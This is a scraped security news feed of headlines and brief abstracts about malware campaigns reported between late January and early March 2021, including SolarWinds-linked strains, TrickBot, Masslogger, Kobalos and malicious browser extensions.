FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a "sophisticated second-stage backdoor," as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor's tactics and techniques. Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot , Sunburst (or Solorigate), Teardrop , and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives . "These tools are new pieces of malware that are unique to this actor," Microsoft said . "They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions." Microsoft alThe Hacker News
March 4, 2021
Microsoft, FireEye Unmask More Malware Linked to SolarWinds Attackers Full Text
Abstract
Researchers with Microsoft and FireEye found three new malware families, which they said are used by the threat group behind the SolarWinds attack.Threatpost
March 4, 2021
Sunshuttle, the fourth malware allegedly linked to SolarWinds hack Full Text
Abstract
FireEye researchers spotted a new sophisticated second-stage backdoor that was likely linked to threat actors behind the SolarWinds hack. Malware researchers at FireEye discovered a new sophisticated second-stage backdoor, dubbed Sunshuttle, while...Security Affairs
March 4, 2021
Microsoft links new malware to SolarWinds hackers Full Text
Abstract
Microsoft released details Thursday on later-stage malware the company says was used by the group behind the SolarWinds espionage campaign that breached several government agencies and private firms including Microsoft and FireEye. A coordinated blog from FireEye provided a separate deep dive on one of the malware strains in the Microsoft post, but the firm…SCMagazine
March 04, 2021
Microsoft reveals 3 new malware strains used by SolarWinds hackers Full Text
Abstract
Microsoft has revealed information on newly found malware the SolarWinds hackers deployed on victims' networks as second-stage payloads.BleepingComputer
March 04, 2021
Microsoft reveals new malware used by the SolarWinds hackers Full Text
Abstract
Microsoft has revealed information on newly found malware the SolarWinds hackers deployed on victims' networks as second-stage payloads.BleepingComputer
March 04, 2021
FireEye finds new malware likely linked to SolarWinds hackers Full Text
Abstract
FireEye discovered a new "sophisticated second-stage backdoor" on the servers of an organization compromised by the threat actors behind the SolarWinds supply-chain attack.BleepingComputer
March 4, 2021
New Malicious NPM Packages Attack Amazon & Slack Full Text
Abstract
Recently, the cybersecurity researchers at Sonatype have detected a very new type of "dependency confusion" packages that have been assigned to the...Cyber Security News
March 3, 2021
The Ursnif Trojan has hit over 100 Italian banks Full Text
Abstract
Avast researchers reported that the infamous Ursnif Trojan was employed in attacks against at least 100 banks in Italy. Avast experts recently obtained information on possible victims of Ursnif malware that confirms the interest of malware operators...Security Affairs
March 3, 2021
Hackers Using Tricky SEO Technique to Deliver Malware Payloads Full Text
Abstract
Gootloader appears to have expanded its payloads further as it now uses SEO poisoning to deliver an array of malware payloads against users in South Korea, Germany, France, and the U.S.Cyware Alerts - Hacker News
March 3, 2021
Mobile malware evolution 2020 Full Text
Abstract
In their campaigns to infect mobile devices, cybercriminals always resort to social engineering tools, the most common being passing a malicious application off as another, popular and desirable one.Kaspersky Labs
March 3, 2021
Researcher discovers Go typosquatting package that relays system information to Chinese tech firm Full Text
Abstract
One of two packages deemed to warrant further investigation purported to be the GitHub ‘cli’ repository that is widely used for building CLI (command-line interface) Go projects.The Daily Swig
March 3, 2021
ObliqueRAT Trojan now lurks in images on compromised websites Full Text
Abstract
Steganography is used to hide code, images, and video content within other content of file formats, and in this case, the researchers have found BMP files that contain malicious ObliqueRAT payloads.ZDNet
March 2, 2021
Compromised Website Images Camouflage ObliqueRAT Malware Full Text
Abstract
Emails spreading the ObliqueRAT malware now make use of steganography, disguising their payloads on compromised websites.Threatpost
March 2, 2021
Beware – Mobile Threats shifts Towards Banking Trojans and Adware Full Text
Abstract
Recently in the Mobile Malware Evolution 2020, the very famous cybersecurity company Kaspersky has reported the prevailing mobile threat landscape and recognizes...Cyber Security News
March 02, 2021
Malicious NPM packages target Amazon, Slack with new dependency attacks Full Text
Abstract
Threat actors are targeting Amazon, Zillow, Lyft, and Slack NodeJS apps using the new 'Dependency Confusion' vulnerability to steal Linux/Unix password files and open reverse shells back to the attackers.BleepingComputer
March 01, 2021
Gootkit RAT Using SEO to Distribute Malware Through Compromised Sites Full Text
Abstract
A framework notorious for delivering a banking Trojan has received a facelift to deploy a wider range of malware, including ransomware payloads. "The Gootkit malware family has been around more than half a decade – a mature Trojan with functionality centered around banking credential theft," Sophos researchers Gabor Szappanos and Andrew Brandt said in a write-up published today. "In recent years, almost as much effort has gone into improvement of its delivery method as has gone into the NodeJS-based malware itself." Dubbed "Gootloader," the expanded malware delivery system comes amid a surge in the number of infections targeting users in France, Germany, South Korea, and the U.S. First documented in 2014, Gootkit is a Javascript-based malware platform capable of carrying out an array of covert activities, including web injection, capturing keystrokes, taking screenshots, recording videos, as well as email and password theft. Over the years, theThe Hacker News
March 1, 2021
Gootkit delivery platform Gootloader used to deliver additional payloads Full Text
Abstract
The Javascript-based infection framework for the Gootkit RAT was enhanced to deliver a wider variety of malware, including ransomware. Experts from Sophos documented the evolution of the “Gootloader,” the framework used for delivering the Gootkit...Security Affairs
March 1, 2021
Mobile Adware Booms, Online Banks Become Prime Target for Attacks Full Text
Abstract
A snapshot of the 2020 mobile threat landscape reveals major shifts toward adware and threats to online banks.Threatpost
March 1, 2021
Go Malware Detections Increase 2000% Full Text
Abstract
Intezer warns of growing threat from programming languageInfosecurity Magazine
February 28, 2021
What are these suspicious Google GVT1.com URLs? Full Text
Abstract
These Google-owned domains have confused even the most skilled researchers and security products time and time again if these are malicious. The domains in question are redirector.gvt1.com and gvt1/gvt2 subdomains that have spun many threads on the internet. BleepingComputer has dug deeper into the origin of these domains.BleepingComputer
February 27, 2021 {: .fs-4 .fw-700 .lh-0 }
LazyScripter Hackers Using Multiple RATs to Target Airlines Full Text
Abstract
Malwarebytes spots a new threat group dubbed LazyScripter that targets the International Air Transport Association (IATA) members, airlines, and refugees to Canada.Cyware Alerts - Hacker News
February 27, 2021
A New Malware Shares Similarities With WaterBear Full Text
Abstract
Palo Alto Networks found a highly sophisticated malware potentially linked to the BlackTech hacking group. It has features and behavior that strongly resembles the WaterBear malware family.Cyware Alerts - Hacker News
February 27, 2021
Go malware is now common, having been adopted by both APTs and e-crime groups Full Text
Abstract
The number of malware strains coded in the Go programming language has seen a sharp increase of around 2,000% over the last few years, since 2017, cybersecurity firm Intezer said in a report published this week.ZDNet
February 26, 2021
Stalkerware Volumes Remain Concerningly High, Despite Bans Full Text
Abstract
COVID-19 impacted volumes for the year, but the U.S. moved into third place on the list of countries most infected by stalkerware.Threatpost
February 26, 2021
Malware Gangs Partner Up in Double-Punch Security Threat Full Text
Abstract
From TrickBot to Ryuk, more malware cybercriminal groups are putting their heads together when attacking businesses.Threatpost
February 26, 2021
Malicious Firefox extension allowed hackers to hijack Gmail accounts Full Text
Abstract
Several Tibetan organizations were targeted in a cyber-espionage campaign by a state-backed hacking group using a malicious Firefox extension designed to hijack Gmail accounts and infect victims with malware.BleepingComputer
February 26, 2021
SQL Triggers in Website Backdoors Full Text
Abstract
Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases to infiltrate them.Sucuri
February 25, 2021
ThreatNeedle malware tied to year-long North Korean espionage campaign against global defense industry Full Text
Abstract
Researchers at Kasperksy have tied a piece of malware used by Lazarus Group last seen targeting security vulnerability researchers earlier this year to another campaign by the North Korean hacking group focused on pilfering sensitive data from defense contractors.SCMagazine
February 25, 2021
Malicious Mozilla Firefox Extension Allows Gmail Takeover Full Text
Abstract
The malicious extension, FriarFox, snoops in on both Firefox and Gmail-related data.Threatpost
February 25, 2021
Researchers Uncovered a New Office Malware Builder Dubbed APOMacroSploit Full Text
Abstract
Security researchers at Check Point have recently discovered a new Office malware builder that is named as APOMacroSploit. This malware has been...Cyber Security News
February 25, 2021
Turkey Dog Campaign Targets Turkish Speakers with Trojanized Apps via COVID Lures Full Text
Abstract
The current Turkey Dog-related campaigns use lure pages that promise cash payments of thousands of Turkish Lira, purporting to be tied to the Turkish government to steal information or plant malware.Risk IQ
February 24, 2021
Masslogger Malware Adopts New Initial Attack Technique Full Text
Abstract
A variant of Masslogger Trojan is being used by criminals to steal Microsoft Outlook, Google Chrome, and Messenger account credentials.Cyware Alerts - Hacker News
February 24, 2021
Mac and Windows Devices Pelted with New Threats Full Text
Abstract
Researchers discovered two pieces of malware in a span of two weeks that appear to run natively on Apple’s recently introduced M1 System-on-Chip (SoC).Cyware Alerts - Hacker News
February 23, 2021
Lazarus Group Using AppleJeus Malware for Cryptocurrency Theft Full Text
Abstract
A joint cybersecurity advisory from the U.S. government is warning against AppleJeus malware, the Lazarus group's new development, that masquerades as crypto trading software.Cyware Alerts - Hacker News
February 23, 2021
Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures Full Text
Abstract
Once triggered, MINEBRIDGE buries itself into the vulnerable TeamViewer, enabling attackers to take a wide array of remote follow-on actions such as spying on users or deploying additional malware.Zscaler
February 22, 2021
Google Alerts used to launch fake Adobe Flash Player updater Full Text
Abstract
The threat actors are “quite clever” in using Google Alerts as an attack vector to prompt users to “update” Adobe Flash Player.SCMagazine
February 22, 2021
New Silver Sparrow malware infects 30,000 Macs for unknown purpose Full Text
Abstract
A new macOS malware known as Silver Sparrow has silently infected almost 30,000 Mac devices with malware whose purpose is a mystery.BleepingComputer
February 22, 2021
IronNetInjector: Turla’s New Malware Loading Tool Full Text
Abstract
The method, known as Bring Your Own Interpreter (BYOI), involves use of an interpreter, not present on a system by default, to run malicious code of an interpreted programming or scripting language.Palo Alto Networks
February 22, 2021
Researchers uncovered a new Malware Builder dubbed APOMacroSploit Full Text
Abstract
Researchers spotted a new Office malware builder, tracked as APOMacroSploit, that was employed in a campaign targeting more than 80 customers worldwide. Researchers from security firm Check Point uncovered a new Office malware builder called APOMacroSploit,...Security Affairs
February 21, 2021
Warning: Google Alerts abused to push fake Adobe Flash updater Full Text
Abstract
Threat actors are using Google Alerts to promote a fake Adobe Flash Player updater that installs other unwanted programs on unsuspecting users' computers.BleepingComputer
February 20, 2021
Silver Sparrow, a new malware infects Mac systems using Apple M1 chip Full Text
Abstract
Experts warn of new malware, dubbed Silver Sparrow, that is infecting Mac systems using the latest Apple M1 chip across the world. Malware researchers at Red Canary uncovered a new malware, dubbed Silver Sparrow, that is infecting Mac systems using...Security Affairs
February 19, 2021
Mysterious Silver Sparrow Malware Found Nesting on 30K Macs Full Text
Abstract
A second malware that targets Macs with Apple’s in-house M1 chip is infecting machines worldwide — but it’s unclear why.Threatpost
February 19, 2021
New Masslogger Trojan variant exfiltrates user credentials Full Text
Abstract
MassLogger Windows credential stealer infamous is back and it has been upgraded to steal credentials from Outlook, Chrome, and instant messenger apps. MassLogger Windows credential stealer is back and it has been upgraded to steal credentials from...Security Affairs
February 19, 2021
Experts spotted the first malware tailored for Apple M1 Chip, it is just the beginning Full Text
Abstract
Apple launched its M1 chip and cybercriminals developed a malware sample specifically for it, the latest generation of Macs are their next targets. The popular security researcher Patrick Wardle discovered one of the first malware designed to target...Security Affairs
February 19, 2021
AppleJeus: Analysis of North Korea’s Cryptocurrency Malware Full Text
Abstract
This joint advisory is the result of analytic efforts among the FBI, the CISA, and the Treasury to highlight the threat to cryptocurrency posed by North Korea and provide mitigation recommendations.CISA
February 19, 2021
Masslogger Trojan Upgraded to Steal All Your Outlook, Chrome Credentials Full Text
Abstract
A credential stealer infamous for targeting Windows systems has resurfaced in a new phishing campaign that aims to steal credentials from Microsoft Outlook, Google Chrome, and instant messenger apps. Primarily directed against users in Turkey, Latvia, and Italy starting mid-January, the attacks involve the use of MassLogger — a .NET-based malware with capabilities to hinder static analysis — building on similar campaigns undertaken by the same actor against users in Bulgaria, Lithuania, Hungary, Estonia, Romania, and Spain in September, October, and November 2020. MassLogger was first spotted in the wild last April, but the presence of a new variant implies malware authors are constantly retooling their arsenal to evade detection and monetize them. "Although operations of the Masslogger trojan have been previously documented, we found the new campaign notable for using the compiled HTML file format to start the infection chain," researchers with Cisco Talos said on WThe Hacker News
February 18, 2021
Second malware strain primed to attack Apple’s new M1 chip identified Full Text
Abstract
In just three months, hackers have debuted at least two strains of malware designed to attack Apple’s new M1 chip. Noted Mac security researcher Patrick Wardle published a blog Feb. 14 noting that a Safari adware extension that was originally written to run on Intel x86 chips was revamped to run on the new M1…SCMagazine
February 18, 2021
US shares info on North Korean malware used to steal cryptocurrency Full Text
Abstract
The FBI, CISA, and US Department of Treasury shared detailed info on malicious and fake crypto-trading applications used by North Korean-backed state hackers to steal cryptocurrency from individuals and companies worldwide in a joint advisory published on Wednesday.BleepingComputer
February 18, 2021
Cred-stealing trojan harvests logins from Chromium browsers, Outlook and more, warns Cisco Talos Full Text
Abstract
Delivered through phishing emails, the Masslogger trojan’s latest variant is contained within a multi-volume RAR archive using the .chm file format and .r00 extensions, said Switchzilla researchers.The Register
February 18, 2021
First Malware Designed for Apple M1 Chip Discovered in the Wild Full Text
Abstract
One of the first malware samples tailored to run natively on Apple's M1 chips has been discovered, suggesting a new development that indicates that bad actors have begun adapting malicious software to target the company's latest generation of Macs powered by its own processors. While the transition to Apple silicon has necessitated developers to build new versions of their apps to ensure better performance and compatibility, malware authors are now undertaking similar steps to build malware that are capable of executing natively on Apple's new M1 systems, according to macOS Security researcher Patrick Wardle. Wardle detailed a Safari adware extension called GoSearch22 that was originally written to run on Intel x86 chips but has since been ported to run on ARM-based M1 chips. The rogue extension, which is a variant of the Pirrit advertising malware, was first seen in the wild on November 23, 2020, according to a sample uploaded to VirusTotal on December 27. "TodThe Hacker News
February 17, 2021
Trickbot’s Sibling, Bazarbackdoor, is Hunting Down its Targets Vigorously Full Text
Abstract
Researchers have observed a newer, stealthier version of BazarBackdoor, which is written in Nim language to enhance its evasion capabilities, being increasingly distributed through spam campaigns.Cyware Alerts - Hacker News
February 17, 2021
ScamClub malvertising gang abused WebKit zero-day to redirect to online gift card scams Full Text
Abstract
Malvertising gang ScamClub has exploited an unpatched zero-day vulnerability in WebKit-based browsers in a campaign aimed at realizing online gift card scams. The Malvertising gang ScamClub has abused an unpatched zero-day vulnerability in WebKit-based...Security Affairs
February 17, 2021
Latin American Javali Trojan Exploits Avira Antivirus Legitimate Injector to Implant Malware Full Text
Abstract
Javali trojan is active since November 2017 and targets users of financial and banking organizations geolocated in Brazil and Mexico using similar routines as other Latin American trojans.Security Affairs
February 17, 2021
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to implant malware Full Text
Abstract
Latin American Javali trojan weaponizing Avira antivirus legitimate injector to implant malware In the last few years, many banking trojans developed by Latin American criminals have increased in volume and sophistication. Although exists a strong...Security Affairs
February 15, 2021
The malicious code in SolarWinds attack was the work of 1,000+ developers Full Text
Abstract
Microsoft says it found 1,000-plus developers' fingerprints on the SolarWinds attack Microsoft’s analysis of the SolarWinds supply chain attack revealed that the code used by the threat actors was the work of a thousand developers. Microsoft...Security Affairs
February 14, 2021
Hildegard: TeamTNT’s New Feature-Rich Malware Targeting Kubernetes Full Text
Abstract
The hacking group TeamTNT introduced a new piece of malware with an improved ability to steal Docker credentials. It was found exploiting Kubernetes systems.Cyware Alerts - Hacker News
February 13, 2021
New Agent Tesla Variants can Bypass Security Walls Full Text
Abstract
As researchers continue to block new attack vectors, actors behind Agent Tesla malware have been found launching new variants designed to infect Microsoft Antimalware Scan Interface (AMSI) itself.Cyware Alerts - Hacker News
February 13, 2021
Rising Security Concerns Over the Takedown of Emotet Full Text
Abstract
By the time law enforcement intervened, Emotet had infected more than 1.6 million machines and caused hundreds of millions of dollars in damage.Cyware Alerts - Hacker News
February 13, 2021
Microsoft said the number of web shells has doubled since last year Full Text
Abstract
In a blog post, the Redmond company said it detected roughly 140,000 web shells per month between August 2020 and January 2021, up from the 77,000 average it reported last year.ZDNet
February 11, 2021
Pre-Valentine’s Day Malware Attack Mimics Flower, Lingerie Stores Full Text
Abstract
Emails pretending to confirm hefty orders from lingerie shop Ajour Lingerie and flower store Rose World are actually spreading the BazaLoader malware.Threatpost
February 11, 2021
Android spyware strains linked to state-sponsored Confucius threat group Full Text
Abstract
First detected in 2013, Confucius has been linked to attacks on governments in Southeast Asia, and targeted strikes on Pakistani military personnel, Indian election officials, and nuclear agencies.ZDNet
February 11, 2021
Various Malware Lurking in Discord App to Target Gamers Full Text
Abstract
Research from Zscaler ThreatLabZ shows attackers using spam emails and legitimate-looking links to gaming software to serve up Epsilon ransomware, the XMRrig cryptominer and various data and token stealers.Threatpost
February 11, 2021
Military, Nuclear Entities Under Target By Novel Android Malware Full Text
Abstract
The two malware families have sophisticated capabilities to exfiltrate SMS messages, WhatsApp messaging content and geolocation.Threatpost
February 11, 2021
TrickBot’s BazarBackdoor malware is now coded in Nim to evade antivirus Full Text
Abstract
TrickBot's stealthy BazarBackdoor malware has been rewritten in the Nim programming language, likely to evade detection by security software.BleepingComputer
February 10, 2021
BazarBackdoor’s Stealthy Infiltration Evades Multiple SEGs Full Text
Abstract
The malware attack campaign, first observed in mid-December, carries pharmaceutical-themed invoices that contain references to a series of websites hosted on the “shop” domain.Cofense
February 10, 2021
LodaRAT Windows Malware Now Also Targets Android Devices Full Text
Abstract
A previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives. "The developers of LodaRAT have added Android as a targeted platform," Cisco Talos researchers said in a Tuesday analysis. "A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities." Kasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted. The reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor. First documented in May 2017 by Proofpoint , Loda is an AutoIt malware typically delivered via phishing lures that's equipped to run a wide range of commands designed to record audio, video, and capture othThe Hacker News
February 9, 2021
2016 Facebook malware campaign resurfaces, India top victim Full Text
Abstract
A 2016 Facebook malware campaign, known to use a combination of Windows trojan, browser injections, clever scripting, and a bug in the social network's platform, has resurfaced in India.The Times Of India
February 9, 2021
TeamTNT Back at it Again - Kubernetes Edition Full Text
Abstract
Unit42 researchers discovered a new malware, Hildegard, that is being leveraged to launch cryptojacking attacks on Kubernetes clusters.Cyware Alerts - Hacker News
February 8, 2021
Police Seize $60 Million of Bitcoin That Generated Via Installing Malware Full Text
Abstract
The officials of Germany have recently seized a digital wallet that was assumed to carry $60 million in bitcoins; all these bitcoins were acquired through fraudulent online activity.GB Hackers
February 08, 2021
Android app joins the dark side, sends malware update to millions Full Text
Abstract
Google has removed a popular Android barcode scanner app with over 10 million installs from the Play Store after researchers found that it turned malicious following a December 2020 update.BleepingComputer
February 8, 2021
CinaRAT Resurfaces With New Evasive Tactics and Techniques Full Text
Abstract
Different versions of multi-staged loaders attempt to inject and execute CinaRAT within the victim’s host memory. CinaRAT code is available on GitHub; generally it's just a rebranded QuasarRAT.Morphisec
February 6, 2021
Microsoft Tailing Dynamically Generated Email Infrastructure Full Text
Abstract
Microsoft digs into emerging email infrastructure, consisting of two segments named StrangeU and RandomU, that send over a million malware-laden emails each month.Cyware Alerts - Hacker News
February 06, 2021
The Great Suspender Chrome extension’s fall from grace Full Text
Abstract
Google has forcibly uninstalled the immensely popular 'The Great Suspender' extension from Google Chrome and classified it as malware.BleepingComputer
February 6, 2021
Watch out! ‘The Great Suspender’ Chrome extension contains Malware Full Text
Abstract
Google removed the popular The Great Suspender from the official Chrome Web Store for containing malware and deactivated it from the users' PC. Google on Thursday removed The Great Suspender extension from the Chrome Web Store. Million of users...Security Affairs
February 06, 2021
WARNING — Hugely Popular ‘The Great Suspender’ Chrome Extension Contains Malware Full Text
Abstract
Google on Thursday removed The Great Suspender , a popular Chrome extension used by millions of users, from its Chrome Web Store for containing malware. It also took the unusual step of deactivating it from users' computers. "This extension contains malware," read a terse notification from Google, but it has since emerged that the add-on stealthily added features that could be exploited to execute arbitrary code from a remote server, including tracking users online and committing advertising fraud. "The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more," Calum McConnell said in a GitHub post. The extension, which had more than two million installs before it was disabled, would suspend tabs that aren't in use, replacing them with a blank gray screen until they were reloaded upon returning to the tabs in question. Signs of theThe Hacker News
February 05, 2021
Malicious extension abuses Chrome sync to steal users’ data Full Text
Abstract
The Google Chrome Sync feature can be abused by threat actors to harvest information from compromised computers using maliciously-crafted Chrome browser extensions.BleepingComputer
February 5, 2021
TeamTNT group uses Hildegard Malware to target Kubernetes Systems Full Text
Abstract
The TeamTNT hacker group has been employing a new piece of malware, dubbed Hildegard, to target Kubernetes installs. The hacking group TeamTNT has been employing a new piece of malware, dubbed Hildegard, in a series of attacks targeting Kubernetes...Security Affairs
February 5, 2021
Hackers Hijacking Google Search Results via Backdoored Browser Extensions Full Text
Abstract
Cybersecurity researchers at Avast have recently reported a huge campaign comprised of dozens of malicious Chrome and Edge browser extensions along with...Cyber Security News
February 4, 2021
Whitespace Steganography Conceals Web Shell in PHP Malware Full Text
Abstract
The web shell provides attackers with tools to work with files and databases on the targeted server, collect sensitive information, infect files, and conduct brute force attacks.Sucuri
February 4, 2021
The Drovorub Mystery: Malware NSA Warned About Can’t Be Found Full Text
Abstract
An advisory by the NSA and the FBI shares information on how Drovorub works, how it can be detected, and how organizations can protect their systems against attacks involving the malware.Security Week
February 3, 2021
TeamTNT launches cryptojacking operation on Kubnernetes clusters Full Text
Abstract
Although the malware is still under development and the campaign has not spread widely, Unit 42 believes the attacker will soon improve the tools and start a large-scale deployment.SCMagazine
February 3, 2021
Emotet’s Takedown: Have We Seen the Last of the Malware? Full Text
Abstract
A week after law enforcement agencies said they took down Emotet, there has been no sign of the prolific malware.Threatpost
February 3, 2021
New Malware Hijacks Kubernetes Clusters to Mine Monero Full Text
Abstract
Researchers warn that the Hildegard malware is part of ‘one of the most complicated attacks targeting Kubernetes.’Threatpost
February 3, 2021
New Trickbot Malware Component Performs Local Network Reconnaissance Full Text
Abstract
Trickbot recently added a fresh module to scan local network systems with open ports for quick lateral movement. Names masrv, the component incorporates a copy of the Masscan open-source utility.Cyware Alerts - Hacker News
February 03, 2021
Over a Dozen Chrome Extensions Caught Hijacking Google Search Results for Millions Full Text
Abstract
New details have emerged about a vast network of rogue extensions for Chrome and Edge browsers that were found to hijack clicks to links in search results pages to arbitrary URLs, including phishing sites and ads. Collectively called " CacheFlow " by Avast, the 28 extensions in question — including Video Downloader for Facebook, Vimeo Video Downloader, Instagram Story Downloader, VK Unblock — made use of a sneaky trick to mask its true purpose: Leverage Cache-Control HTTP header as a covert channel to retrieve commands from an attacker-controlled server. All the backdoored browser add-ons have been taken down by Google and Microsoft as of December 18, 2020, to prevent more users from downloading them from the official stores. According to telemetry data gathered by the firm, the top three infected countries were Brazil, Ukraine, and France, followed by Argentina, Spain, Russia, and the U.S. The CacheFlow sequence began when unsuspecting users downloaded one of theThe Hacker News
February 03, 2021
A New Linux Malware Targeting High-Performance Computing Clusters Full Text
Abstract
High-performance computing clusters belonging to university networks as well as servers associated with government agencies, endpoint security vendors, and internet service providers have been targeted by a newly discovered backdoor that gives attackers the ability to execute arbitrary commands on the systems remotely. Cybersecurity firm ESET named the malware " Kobalos " — a nod to a " mischievous creature " of the same name from Greek mythology — for its "tiny code size and many tricks." "Kobalos is a generic backdoor in the sense that it contains broad commands that don't reveal the intent of the attackers," researchers Marc-Etienne M. Léveillé and Ignacio Sanmillan said in a Tuesday analysis. "In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers." Besides tracing the malware back to attacks against a nuThe Hacker News
February 2, 2021
High-performance computing malware targeting Linux, Solaris and possibly Microsoft Full Text
Abstract
The attacks have been spread out between the U.S., Europe, and Asia, and have included HPC clusters as well as university systems, a large internet service provider, personal systems, and marketing and hosting firms.SCMagazine
February 2, 2021
Destroying the Destroyer - Malware Edition Full Text
Abstract
Dubbed Operation LadyBird, Emotet's infrastructure was taken down by the joint collaboration between law enforcement agencies from the U.S., the U.K, Canada, along with Europol and Eurojust.Cyware Alerts - Hacker News
February 02, 2021
Agent Tesla Malware Spotted Using New Delivery & Evasion Techniques Full Text
Abstract
Security researchers on Tuesday uncovered new delivery and evasion techniques adopted by Agent Tesla remote access trojan (RAT) to get around defense barriers and monitor its victims. Typically spread through social engineering lures, the Windows spyware not only now targets Microsoft's Antimalware Scan Interface ( AMSI ) in an attempt to defeat endpoint protection software, it also employs a multi-stage installation process and makes use of Tor and Telegram messaging API to communicate with a command-and-control (C2) server. Cybersecurity firm Sophos , which observed two versions of Agent Tesla — version 2 and version 3 — currently in the wild, said the changes are yet another sign of Agent Tesla's constant evolution designed to make a sandbox and static analysis more difficult. "The differences we see between v2 and v3 of Agent Tesla appear to be focused on improving the success rate of the malware against sandbox defenses and malware scanners, and on providing moreThe Hacker News
February 2, 2021
TrickBot Continues Resurgence with Port-Scanning Module Full Text
Abstract
The infamous malware has incorporated the legitimate Masscan tool, which looks for open TCP/IP ports with lightning-fast results.Threatpost
February 2, 2021
Android Gets Its New Malware for the Year Full Text
Abstract
Dubbed Oscorp, the malware abuses accessibility services in Android devices to steal user credentials and media content. The malware gets its name from the title of the login page of its C2 server.Cyware Alerts - Hacker News
February 2, 2021
Kobalos, a complex Linux malware targets high-performance computing clusters Full Text
Abstract
ESET experts uncovered a previously undocumented piece of malware that had been observed targeting high-performance computing clusters (HPC). ESET analyzed a new piece of malware, dubbed Kobalos, that was employed in attacks against high-performance...Security Affairs
February 2, 2021
New Sophisticated Multiplatform Malware ‘Kobalos’ Targets Linux Supercomputers Full Text
Abstract
Once the malware has landed on a supercomputer, the code buries itself in an OpenSSH server executable and will trigger the backdoor if a call is made through a specific TCP source port.ZDNet
February 02, 2021
Trickbot malware now maps victims’ networks using Masscan Full Text
Abstract
The Trickbot malware has been upgraded with a network reconnaissance module designed to survey local networks after infecting a victim's computer.BleepingComputer
February 02, 2021
Malicious script steals credit card info stolen by other hackers Full Text
Abstract
A threat actor has infected an e-commerce store with a custom credit card skimmer designed to siphon data stolen by a previously deployed Magento card stealer.BleepingComputer
February 02, 2021
New Linux malware steals SSH credentials from supercomputers Full Text
Abstract
A new backdoor has been targeting supercomputers across the world, often stealing the credentials for secure network connections by using a trojanized version of the OpenSSH software.BleepingComputer
February 1, 2021
Experts discovered a new Trickbot module used for lateral movement Full Text
Abstract
Experts spotted a new Trickbot module that is used to scan local networks and make lateral movement inside the target organization. Cybersecurity researchers discovered a new module of the Trickbot malware, dubbed 'masrv', that is used to scan a local...Security Affairs
February 1, 2021
Experts discovered a new Trickbot module used for lateral movement Full Text
Abstract
Experts spotted a new Trickbot module that is used to scan local networks and make lateral movement inside the target organization. Cybersecurity researchers discovered a new module of the Trickbot malware, dubbed 'masrv', that is used to scan a local...Security Affairs
February 1, 2021
DanaBot Back to the Grind Full Text
Abstract
Instead of demanding an immediate ransom from victims, Danabot is focused on gaining persistence and stealing data that can be monetized later.Cyware Alerts - Hacker News
February 1, 2021
Alleged Gaming Software Supply-Chain Attack Installs Spyware Full Text
Abstract
Researchers allege that software used for downloading Android apps onto PCs and Macs has been compromised to install malware onto victim devices.Threatpost
February 01, 2021
Android emulator supply-chain attack targets gamers with malware Full Text
Abstract
ESET researchers have discovered that the updating mechanism of NoxPlayer, an Android emulator for Windows and macOS, made by Hong Kong-based company BigNox, was compromised by an unknown threat actor and used to infect gamers with malware.BleepingComputer
February 01, 2021
A New Software Supply‑Chain Attack Targeted Millions With Spyware Full Text
Abstract
Cybersecurity researchers today disclosed a new supply chain attack compromising the update mechanism of NoxPlayer, a free Android emulator for PCs and Macs. Dubbed " Operation NightScout " by Slovak cybersecurity firm ESET, the highly-targeted surveillance campaign involved distributing three different malware families via tailored malicious updates to selected victims based in Taiwan, Hong Kong, and Sri Lanka. NoxPlayer, developed by Hong Kong-based BigNox, is an Android emulator that allows users to play mobile games on PC, with support for keyboard, gamepad, script recording, and multiple instances. It is estimated to have over 150 million users in more than 150 countries. First signs of the ongoing attack are said to have originated around September 2020, from when the compromise continued until "explicitly malicious activity" was uncovered this week, prompting ESET to report the incident to BigNox. "Based on the compromised software in question anThe Hacker News
February 01, 2021
New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers Full Text
Abstract
A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke , the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. "Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ( CVE-2016-3088 ), Oracle WebLogic ( CVE-2017-10271 ) and Redis (unsecure instances)." "Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently." First documentedThe Hacker News
February 1, 2021
Trickbot Trojan Back from the Dead in New Campaign Full Text
Abstract
Infamous Trojan is spreading again, says Menlo SecurityInfosecurity Magazine
January 31, 2021
Pro-Ocean Malware Has New Wings Full Text
Abstract
Palo Alto is alerting organizations about new updates in Rocke Group’s new version of malware that was used throughout 2018 and 2019 to illegally mine Monero from infected Linux machines.Cyware Alerts - Hacker News
January 30, 2021
Is TrickBot Indestructible? Full Text
Abstract
After a takedown attempt in 2020 by the global law enforcement, that somehow wasn't that successful, a new TrickBot version has arrived.Cyware Alerts - Hacker News
January 29, 2021
Here’s how law enforcement’s Emotet malware module works Full Text
Abstract
New research released today provides greater insight into the Emotet module created by law enforcement that will uninstall the malware from infected devices in April.BleepingComputer
January 29, 2021
Here’e how law enforcement’s Emotet malware module works Full Text
Abstract
